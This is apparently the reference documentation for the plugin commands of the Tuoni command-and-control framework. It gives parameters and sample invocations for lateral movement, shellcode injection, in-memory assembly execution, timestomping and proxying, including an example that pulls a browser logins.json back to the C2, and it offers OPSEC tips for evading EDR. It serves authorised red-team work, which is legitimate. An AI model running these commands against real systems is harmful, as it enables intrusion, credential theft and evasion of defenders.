Skip to content

Plugin Commands

Commands delivered as server-side plugins. For execution configuration options (process injection, PPID spoofing, etc.) see Execution Context.

Commercial additions

The commercial payload unlocks additional plugin commands: amsi-bypass, mimikatz, keylogger, load-pe, load-dll, load-elf, screen-tracker, memory-layout, webcam, kill, and suspend. See commercial plugin commands →

Quick Reference

Command OS Summary
connect-smb Windows Connect to an SMB (bind) agent
connect-tcp Win / Linux / BSD Connect to a TCP bind agent
cp Win / Linux / BSD Copy a file or directory
download Win / Linux / BSD Exfiltrate a file to the C2
execute-assembly Windows Execute a .NET assembly in memory
inject Windows Inject and run shellcode
jump-service Windows Lateral movement via a Windows service
jump-ssh Windows Lateral movement via SSH
jump-winrm Windows Lateral movement via WinRM
jump-wmi Windows Lateral movement via WMI
mkdir Win / Linux / BSD Create a directory
mv Win / Linux / BSD Move or rename a file
portscan Windows TCP port scan with host discovery
procinfo Windows Detailed info about the agent process
rm Win / Linux / BSD Delete a file
rmdir Win / Linux / BSD Delete a directory
rportfwd Win / Linux / BSD Create a reverse port forward through the C2
screenshot Windows Capture the current screen
socks5 Win / Linux / BSD Start a SOCKS5 proxy on the agent network
spawn Windows Spawn a new agent
upload Win / Linux / BSD Write a file to the target filesystem
upload-payload Win / Linux / BSD Write a generated payload to the target filesystem
powerpick Windows Execute PowerShell without spawning powershell.exe
timestomp Windows Modify file timestamps
remote-exec-ssh Windows Execute a command on a remote host via SSH
remote-exec-winrm Windows Execute a PowerShell command on a remote host via WinRM
remote-exec-wmi Windows Execute a command on a remote host via WMI
remote-exec-service Windows Execute a command on a remote host via a temporary Windows service
remote-upload-scp Windows Upload a payload or file to a remote host via SCP

connect-smb

Purpose: Connects a parent agent to an SMB bind agent, establishing a relayed communication channel.

OS Support: Windows

Parameter Type Required Default Description
host string Yes - IP address or hostname of the target running the SMB agent.
pipename string Yes - Named pipe the SMB agent is listening on.

Example: 

1
connect-smb --host 192.168.1.50 --pipename tuoni_smb

Info

The SMB agent must already be running and listening on the specified pipe before this command is sent. Use upload-payload to stage the agent binary first if needed.

connect-tcp

Purpose: Establishes a connection to a TCP bind agent, making it reachable through the current agent.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
host string Yes - IP address or hostname of the target running the TCP bind agent.
port int Yes - TCP port the bind agent is listening on.

Example: 

1
connect-tcp --host 10.10.10.20 --port 4444

cp

Purpose: Copies a file or directory on the target filesystem.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
source string Yes - Source file or directory path.
destination string Yes - Destination file or directory path.

Example: 

1
cp --source C:\Temp\tool.exe --destination C:\Windows\Temp\svc.exe

download

Purpose: Reads a file from the target filesystem and returns it to the C2 operator.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
filepath string Yes - Path of the file to download. Supports environment variables (e.g. %APPDATA%).

Example: 

1
download --filepath C:\Users\jsmith\AppData\Roaming\Mozilla\Firefox\Profiles\default\logins.json

execute-assembly

Purpose: Loads and executes a .NET assembly (EXE) entirely in memory without writing it to disk.

OS Support: Windows

Parameter Type Required Default Description
@files.executable file Yes - The .NET assembly .exe file to execute.
parameters string[] No - Command-line arguments to pass to the assembly (e.g. ["--audit", "--verbose"]).

Example: 

1
execute-assembly --@files.executable Seatbelt.exe --parameters "-group=system"

OPSEC

.NET CLR loading is detectable by EDR products monitoring for clr.dll loaded into unusual processes. Configure the Execution Context to control the sacrificial process used for assembly execution.

inject

Purpose: Injects raw shellcode into a process and executes it.

OS Support: Windows

Parameter Type Required Default Description
@files.shellcode file Yes - The raw shellcode binary.

Example: 

1
inject --@files.shellcode beacon.bin

OPSEC

Shellcode injection is one of the most heavily monitored operations by EDR products. Use the Execution Context to configure the injection technique and target process. Run ps first to identify a suitable host process.

jump-service

Purpose: Achieves lateral movement by copying a payload to a remote host and running it as a Windows service.

OS Support: Windows

Parameter Type Required Default Description
target string Yes - Target machine IP address or hostname.
payloadId string No - ID of the service-executable payload to deploy. Required when copyMethod is SMB.
copyMethod string No SMB Method for copying the payload to the target. Options: SMB, NONE.
copyPath string No - Full destination path for the copied payload on the remote host. Auto-generated if omitted.
servicePath string No - Path used when creating the service. Defaults to copyPath.
serviceName string No - Internal name of the service to create. Auto-generated if omitted.
serviceDisplayName string No - Display name of the service. Auto-generated if omitted.
cleanup bool No true Delete the service and binary after execution.
username string No - Username for remote authentication (if not using the current token).
password string No - Password for remote authentication.

Example: 

1
2
3
jump-service --payloadId 1 --copyMethod SMB --copyPath \\DC01\C$\Windows\Temp\svc.exe
  --target DC01 --servicePath C:\Windows\Temp\svc.exe
  --serviceName TuoniSvc --serviceDisplayName "Windows Update Helper" --cleanup true

Tip

Cleanup is enabled by default. Set cleanup: false only if you need the service and binary to persist.

Privileges required

Creating services on a remote host requires administrative privileges. Use token-steal or token-make to obtain appropriate credentials before running this command.

jump-ssh

Purpose: Achieves lateral movement by running commands or staging a payload on a remote host via SSH.

OS Support: Windows

Parameter Type Required Default Description
target string Yes - Target machine IP address or hostname.
payloadId string No - ID of the payload to deploy. Required when copyMethod is SMB or SCP.
copyMethod string No - Copy method. Options: SCP, SMB, NONE.
copyPath string No - Destination path on the remote host.
cmdline string No - Command line to execute on the remote host.
authMechanism string No CLASSIC Authentication mechanism. Options: CLASSIC, NTLM, KERBEROS. Note: NTLM/KERBEROS cannot be combined with key-based auth.
username string No - SSH username.
password string No - SSH password. Required with CLASSIC if no privateKeyPEM.
@files.privateKeyPEM file No - PEM-encoded private key for key-based authentication. Required with CLASSIC if no password.
privateKeyPassword string No - Passphrase for the private key file.

Example: 

1
2
jump-ssh --target 10.10.10.30 --username deploy --@files.privateKeyPEM id_rsa
  --cmdline "/tmp/agent &"

jump-winrm

Purpose: Executes commands or runs an executable on a remote host using Windows Remote Management (WinRM).

OS Support: Windows

Parameter Type Required Default Description
payloadId string No - ID of the executable payload to run.
copyMethod string No - Copy method. Options: SMB, NONE.
copyPath string No - Destination path for the payload.
target string Yes - Target machine IP address or hostname.
executablePath string No - Path of the executable to run on the remote host.
customPowershell string No - Custom PowerShell script to execute.
username string No - Username for authentication.
password string No - Password for authentication.

Example: 

1
2
3
jump-winrm --target DC01 --username "CORP\Administrator" --password "P@ssword1"
  --payloadId 1 --copyMethod SMB --copyPath C:\Windows\Temp\agent.exe
  --executablePath C:\Windows\Temp\agent.exe

Privileges required

WinRM lateral movement requires the target machine to have WinRM enabled and the user to be a member of the Remote Management Users group or a local administrator.

jump-wmi

Purpose: Executes a command or payload on a remote host using Windows Management Instrumentation (WMI).

OS Support: Windows

Parameter Type Required Default Description
payloadId string No - ID of the executable payload to run.
copyMethod string No - Copy method for staging the payload. Options: SMB, NONE.
copyPath string No - Destination path for the staged payload.
target string Yes - Target machine IP address or hostname.
cmdline string No - Command line to execute via WMI.
username string No - Username for remote authentication.
password string No - Password for remote authentication.

Example: 

1
2
3
jump-wmi --target 192.168.1.10 --username "CORP\Administrator" --password "P@ssword1"
  --payloadId 1 --copyMethod SMB --copyPath C:\Windows\Temp\agent.exe
  --cmdline C:\Windows\Temp\agent.exe

Tip

jump-wmi can use a stolen token - run token-steal first to avoid passing plaintext credentials. See the Lateral Movement use case for a full walkthrough.

mkdir

Purpose: Creates a new directory on the target filesystem, including any missing parent directories.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
dirpath string Yes - Path of the directory to create.

Example: 

1
mkdir --dirpath C:\ProgramData\Updates\cache

mv

Purpose: Moves or renames a file or directory on the target filesystem.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
source string Yes - Source file or directory path.
destination string Yes - Destination path.
overwrite bool No true Allow overwriting the destination if it already exists.

Example: 

1
mv --source C:\Temp\tool.exe --destination C:\Windows\System32\tool.exe --overwrite true

portscan

Purpose: Performs a TCP port scan against one or more hosts, logging discovered hosts and open ports to the Discovery database.

OS Support: Windows

Parameter Type Required Default Description
ips string Yes - IP addresses or CIDR ranges to scan, comma-separated (e.g. 10.0.0.1,10.0.0.0/24).
ports string Yes - Ports or ranges to scan, comma-separated (e.g. 22,80,443,8000-8080).
hostDiscovery string No ICMP Host discovery method before scanning. Options: ICMP, ARP, NONE. Use NONE to skip discovery and assume all hosts are up.
hostnameResolving string No - Method used to resolve hostnames for discovered hosts. Options: DNS, NETBIOS, ANY, NONE.
timeout int No 1000 Connection timeout per port in milliseconds.
threads int No 10 Number of concurrent threads for scanning.

Example: 

1
portscan --ips 10.10.10.0/24 --ports 22,80,443,445,3389,8080 --hostDiscovery ICMP --timeout 500 --threads 50

Tip

Discovered hosts and services are automatically added to the Discovery database and visible in the Discovery GUI. Use NONE for hostDiscovery when targeting a specific known host to skip the ping sweep.

procinfo

Purpose: Retrieves additional details about the agent's own process (architecture, integrity level, token info, loaded modules).

OS Support: Windows

Parameters: None

Example: 

1
procinfo

rm

Purpose: Deletes a file from the target filesystem.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
filepath string Yes - Path of the file to delete. Supports environment variables.

Example: 

1
rm --filepath C:\Windows\Temp\agent.exe

rmdir

Purpose: Deletes a directory from the target filesystem, including all contents recursively.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
dirpath string Yes - Path of the directory to delete. Supports recursive deletion.

Example: 

1
rmdir --dirpath C:\ProgramData\Updates\cache

Warning

This deletes the directory and all its contents recursively with no confirmation. Verify the path before running.

rportfwd

Purpose: Creates a reverse port forward on the agent, routing inbound traffic back through the C2 server to a specified host and port.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
bindIp string No 0.0.0.0 IP or interface to listen on within the target network.
bindPort int Yes - Port the agent listens on in the target network.
forwardHost string Yes - Host to forward traffic to (resolved from the Tuoni server).
forwardPort int Yes - Port to forward traffic to.

Example: 

1
rportfwd --bindPort 8080 --forwardHost 192.168.100.5 --forwardPort 80

Info

Traffic arrives at agent:8080 in the target network and is forwarded through the C2 server to 192.168.100.5:80. This allows resources on your operator machine or internal network to be reached from within the target environment.

screenshot

Purpose: Captures the current screen of the target machine and returns the image.

OS Support: Windows

Parameters: None

Example: 

1
screenshot

Tip

For continuous monitoring, use the commercial screen-tracker command, which captures screenshots automatically whenever a specified percentage of the screen changes.

socks5

Purpose: Opens a SOCKS5 proxy listener on the C2 server that routes traffic through the agent's network.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
port int Yes - Port the C2 server opens for the SOCKS5 proxy.

Example: 

1
socks5 --port 1080

Info

After running this command, configure your tools (Proxychains, Burp, etc.) to use 127.0.0.1:1080 (or the C2 server IP) as a SOCKS5 proxy. All traffic is routed through the agent's network interface.

spawn

Purpose: Spawns a new agent using a specified listener payload, optionally with encrypted communication.

OS Support: Windows

Parameter Type Required Default Description
payloadId string Yes - ID of the listener payload to use for the new agent.
encryptedCommunication bool No true Whether the new agent uses encrypted communication.

Example: 

1
spawn --payloadId 1

upload

Purpose: Writes a file from the operator's machine to the target filesystem.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
filepath string No - Destination path on the target. Supports environment variables. When omitted, the uploaded filename is used.
@files.file file Yes - The file content to upload.

Example: 

1
upload --filepath C:\Windows\Temp\nc.exe --@files.file nc64.exe

upload-payload

Purpose: Writes a pre-generated Tuoni payload directly to the target filesystem using its payload ID - no manual file selection needed.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
filepath string Yes - Destination path on the target. Supports environment variables.
payloadId string Yes - ID of the payload to write (as shown in the Payloads page).

Example: 

1
upload-payload --filepath C:\Windows\Temp\agent.exe --payloadId 1

Tip

upload-payload is the preferred way to stage agents for lateral movement commands (jump-wmi, jump-service, etc.) - it avoids handling the binary manually and keeps the payload ID consistent.

powerpick

Purpose: Executes a PowerShell command or script using an in-process unmanaged PowerShell runspace, without spawning powershell.exe.

OS Support: Windows

Parameter Type Required Default Description
command string No - PowerShell command or script to execute. When omitted, an interactive session is opened.

Example: 

1
powerpick --command "Get-Process | Select-Object Name, Id"

OPSEC

Because powerpick does not spawn a powershell.exe child process, it avoids process-based detections that look for PowerShell execution under unexpected parents. The CLR is still loaded into the agent process.

timestomp

Purpose: Modifies the timestamps of a file on the target filesystem to aid anti-forensic analysis.

OS Support: Windows

Parameter Type Required Default Description
target string Yes - Path of the file whose timestamps will be modified.
source string No - Path of a reference file to copy timestamps from. When set, created, written, and accessed are ignored.
created string No - New creation timestamp (e.g. 2020-01-01T00:00:00).
written string No - New last-write timestamp.
accessed string No - New last-access timestamp.

Example: 

1
timestomp --target C:\path\to\file.exe --source C:\Windows\System32\notepad.exe

remote-exec-ssh

Purpose: Executes a command on a remote host over SSH.

OS Support: Windows

Parameter Type Required Default Description
target string Yes - Target machine IP address or hostname.
command string Yes - Command to execute on the remote host.
authMechanism string No CLASSIC Authentication mechanism. Options: CLASSIC, NTLM, KERBEROS. Note: NTLM/KERBEROS cannot be combined with key-based auth.
username string No - SSH username.
password string No - Password. Required with CLASSIC if no privateKeyPEM.
@files.privateKeyPEM file No - PEM-encoded private key. Required with CLASSIC if no password.
privateKeyPassword string No - Passphrase for the private key.

Example: 

1
remote-exec-ssh --target 10.10.10.5 --command "id" --username admin --password secret

remote-exec-winrm

Purpose: Executes a PowerShell command on a remote host via WinRM.

OS Support: Windows

Parameter Type Required Default Description
target string Yes - Target machine IP address or hostname.
command string Yes - PowerShell command to execute on the remote host.
username string No - Username for authentication.
password string No - Password for authentication.

Example: 

1
remote-exec-winrm --target DC01 --command "whoami" --username "CORP\Admin" --password "secret"

remote-exec-wmi

Purpose: Executes a command on a remote host using Windows Management Instrumentation (WMI).

OS Support: Windows

Parameter Type Required Default Description
target string Yes - Target machine IP address or hostname.
command string Yes - Command to execute.
commandType string No POWERSHELL How the command is run. Options: POWERSHELL, CMD, CREATE_PROCESS.
username string No - Username for authentication.
password string No - Password for authentication.
hideWindow bool No true Hide the spawned process window.

Example: 

1
remote-exec-wmi --target 192.168.1.10 --command "whoami" --commandType CMD --username "CORP\Admin" --password "secret"

remote-exec-service

Purpose: Executes a command on a remote host by creating a temporary Windows service that runs the command and is then deleted.

OS Support: Windows

Parameter Type Required Default Description
target string Yes - Target machine IP address or hostname.
command string Yes - Command to execute.
commandType string No POWERSHELL How the command is run. Options: POWERSHELL, CMD, CREATE_PROCESS.
username string No - Username for authentication.
password string No - Password for authentication.

Example: 

1
remote-exec-service --target DC01 --command "whoami > C:\out.txt" --commandType CMD --username "CORP\Admin" --password "secret"

Info

A randomly named Windows service is created, used to execute the command, and automatically deleted afterwards.

remote-upload-scp

Purpose: Uploads a generated payload or a custom file to a remote host via SCP.

OS Support: Windows

Parameter Type Required Default Description
target string Yes - Target machine IP address or hostname.
path string No - Destination path on the remote host.
payloadId string No - ID of a generated payload to upload. Mutually exclusive with @files.uploadFile.
@files.uploadFile file No - File to upload. Mutually exclusive with payloadId.
authMechanism string No CLASSIC Authentication mechanism. Options: CLASSIC, NTLM, KERBEROS. Note: NTLM/KERBEROS cannot be combined with key-based auth.
username string No - Username for authentication.
password string No - Password. Required with CLASSIC if no privateKeyPEM.
@files.privateKeyPEM file No - PEM-encoded private key. Required with CLASSIC if no password.
privateKeyPassword string No - Passphrase for the private key.

Example: 

1
remote-upload-scp --target 10.10.10.5 --payloadId 1 --path /tmp/agent --username admin --password secret